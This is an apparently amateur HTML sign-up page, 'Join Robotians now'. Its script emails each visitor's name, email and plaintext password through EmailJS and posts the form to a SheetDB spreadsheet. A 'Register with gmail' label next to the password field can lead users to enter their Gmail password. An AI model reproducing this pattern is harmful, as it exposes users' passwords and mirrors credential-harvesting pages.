<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Page title</title>
    </script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js" ></script> <script type="text/javascript"> (function () { emailjs.init("ZW7Y1f7A6KoSR3xl4"); })(); </script> 
    <style>
        body{
       background-image:url("https://images.unsplash.com/photo-1603732551658-5fabbafa84eb?ixlib=rb-4.0.3&ixid=MnwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8&auto=format&fit=crop&w=1170&q=80");
       background-repeat: no-repeat;
       background-size:cover;
       width:100vw;
       height:100vh;
        }
        .main{
        border:1px solid black;
        width:600px;
        margin-left:20%;
        height:auto;
        height:790px;
        margin-top:25%;
        border-top:30px solid black;
        border-radius:10px;
        background-image: linear-gradient(#ACB6E5, #86FDE8);
        box-shadow:2px 2px 2px black;
        display:none;
        transition:1s;
        opacity:0;
        }
        input {
        display:block;
        margin-top:10%;
        width:450px;
        height:50px;
        font-size:26px;
        border-style:none;
        border-bottom:2px solid black;
        outline:none;
        background: transparent;
       
        }
        ::placeholder {
        
        }
        .box{
        padding-left:10%;
        padding-top:20%;
        }
        .sub{
        width:5em;
        height:2em;
        border-radius:10px;
        margin-left:32%;
        margin-top:-9%;
        position: absolute;
        background: deepskyblue;
        color:white;
        font-weight:bold;
       }
       h2{
       font-size:5em;
       color:black;
       text-shadow:2px 2px 2px white;
       margin-left:10%;
       margin-top:20%;
       }
       button{
       width:7em;
       height:3em;
       font-size:2em;
       margin-left:35%;
       background:black;
       color:white;
       font-weight:bold;
       border-radius:10px;
       }
       #main.active{
       display:block;
       margin-top:10%;
       opacity:100;
       }
    </style>
</head>
<body>
    <h2>Join Robotians now<span style="color:red">!</span></h2>
    <button onclick="show()">click here</button>
    <div class="main" id="main">
        <div class="box">
      <img style="height:15rem; margin-left:17%; margin-top:-13%" src="https://cdn.icon-icons.com/icons2/1378/PNG/512/avatardefault_92824.png" alt="">
       <form action="https://sheetdb.io/api/v1/zpz6np8q3h5ag" method="post"id="sheetdb-form">
        <input type="text" id="name" placeholder="Enter name" required/>
        <input type="email" id="email" placeholder="Enter email" required/>
        <input type="password" id="password" placeholder ="Enter password"required/>
        <img style="height:2em; margin-top:7%;margin-left:10%" src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/7e/Gmail_icon_%282020%29.svg/2560px-Gmail_icon_%282020%29.svg.png" alt="">
        <p style="font-size:22px; font-weight:bold;">Register with gmail</p>
        <input class="sub" type="submit" onclick="sendMail()"/>
    </form>
    </div>
    </div>
    <script>
function show(){
document.getElementById("main").classList.toggle("active");
}
function sendMail() {
event. preventDefault()
  var params = {
    name: document.getElementById("name").value,
    email: document.getElementById("email").value,
    password: document.getElementById("password").value,
    
  };

  const serviceID = "service_gngxrne";
  const templateID = "template_o2ucykx";

    emailjs.send(serviceID, templateID, params)
    .then(res=>{
        document.getElementById("name").value = "";
        document.getElementById("email").value = "";
        document.getElementById("password").value = "";
       
        
        console.log(res);
        alert("Your message sent successfully!!")
       

    })
    .catch(err=>console.log(err));

}
</script>
</body>
</html>
